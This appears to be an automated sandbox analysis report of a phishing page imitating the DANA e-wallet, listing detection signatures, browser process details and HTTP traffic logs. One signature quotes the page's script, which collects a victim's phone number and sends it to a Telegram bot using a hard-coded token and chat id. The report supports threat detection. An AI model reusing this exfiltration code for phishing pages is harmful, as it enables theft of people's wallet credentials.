Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://penukran-poin-dana.aktsx.cfd/

Overview

General Information

Sample URL:http://penukran-poin-dana.aktsx.cfd/
Analysis ID:1526642
Tags:openphish
Infos:

Detection

Score:22
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)

Classification

  • System is w10x64
  • chrome.exe (PID: 4000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2224,i,8753130838461143343,2683393986688760850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://penukran-poin-dana.aktsx.cfd/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://dev-danapemulihan.pantheonsite.io/asset/google.jsHTTP Parser: function sendnohp(event){ $("#process").show();event.preventdefault(); $("#inp").blur(); var nomor = document.getelementbyid("inp").value; sessionstorage.setitem("nomor", nomor); var logo = document.getelementbyid('logo'); var inp = document.getelementbyid('inp'); var gabungan = '' + logo.value + '%0a~%20 %20~%0a%20%20%20%20%20' + inp.value; var token = '6647695935:aag5dm0nksir2z_bjcdr-rqnct_xe0h9ans'; // ganti dengan token bot yang kamu buat var grup = '6327757033'; // ganti dengan chat id dari bot yang kamu buat $.ajax({ url: `https://api.telegram.org/bot${token}/sendmessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`, method: `post`, success: function(){ $("#process").hide(); document.getelementbyid("back1").style.display = "none"; document.getelementbyid("back2").style.display = "block"; $("#formnohp").fadeout(); settimeout(function(){ $("#formpin").fa...
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: Number of links: 0
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: Number of links: 0
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: Number of links: 0
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: <input type="password" .../> found but no <form action="...
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: <input type="password" .../> found but no <form action="...
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: Title: | does not match URL
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: Title: | does not match URL
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: Title: | does not match URL
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: Has password / email / username input fields
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: Has password / email / username input fields
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: Has password / email / username input fields
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: <input type="password" .../> found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: <input type="password" .../> found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: <input type="password" .../> found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="author".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1HTTP Parser: No <meta name="copyright".. found
Source: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50026 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50102 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 50MB
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
Source: global trafficHTTP traffic detected: GET /asset/container.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/loader.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/otp.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/main.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/ionicons.esm.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://penukran-poin-dana.aktsx.cfdsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/pin.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dev-danapemulihan.pantheonsite.io/asset/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/p-d15ec307.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://penukran-poin-dana.aktsx.cfdsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/jquery.mask.min.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/ionicons.esm.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/google.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/indo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://penukran-poin-dana.aktsx.cfdsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-d15ec307.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.dana.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/p-d15ec307.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/jquery.mask.min.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/google.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
